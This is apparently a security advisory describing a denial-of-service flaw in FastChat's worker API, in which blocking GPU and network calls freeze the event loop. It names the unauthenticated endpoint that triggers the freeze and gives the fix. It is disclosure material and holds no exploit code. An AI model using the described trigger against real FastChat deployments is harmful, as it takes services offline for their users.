lm-sys FastChat Denial-of-Service Vulnerability in Worker API Endpoint

Vulnerability

A denial-of-service vulnerability has been identified in lm-sys FastChat versions through 0.2.36. The issue arises in the Worker API Endpoint, specifically within the 'api_generate' and 'api_get_embeddings' functions. These endpoints are part of the FastAPI application and are intended to be non-blocking. However, they directly execute synchronous, resource-intensive tasks, such as GPU inference and network requests to the Hugging Face Inference API, on the main event loop thread. This oversight completely freezes the asyncio event loop, preventing the server from processing concurrent requests or responding to vital health check signals. As a result, the affected model worker becomes unresponsive for the duration of the blocked operation, which can range from several seconds to minutes, depending on the task.

Impact

Exploitation of this vulnerability leads to a complete freeze of the affected model worker, causing all concurrent requests to be queued and unprocessed. This blockage also disrupts heartbeat responses to the controller, which can eventually deregister the worker, making all models on that worker unavailable. In deployments using 'multi_model_worker', the denial-of-service effect cascades across all models served by the worker.

Reproduction

The vulnerability can be reproduced by sending an unauthenticated POST request to the '/worker_get_embeddings' endpoint while simultaneously performing a health check. The health check will be delayed significantly, demonstrating that the event loop is blocked. This can be automated with a script that sends the blocking request and then checks the status, highlighting the disruption caused by the vulnerability.

Remediation

Users are advised to update to the patched version of FastChat, where this vulnerability has been addressed by wrapping the blocking calls in 'asyncio.to_thread()', allowing them to be processed without freezing the event loop.

Added: Apr 20, 2026, 5:19 AM
Updated: Apr 20, 2026, 5:19 AM

Vulnerability Rating

Custom Algorithm
spread
0.0
impact
2.5
exploitability
8.7
remediation
0.0
relevance
6.2
threat
6.4
urgency
2.9
incentive
4.2

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.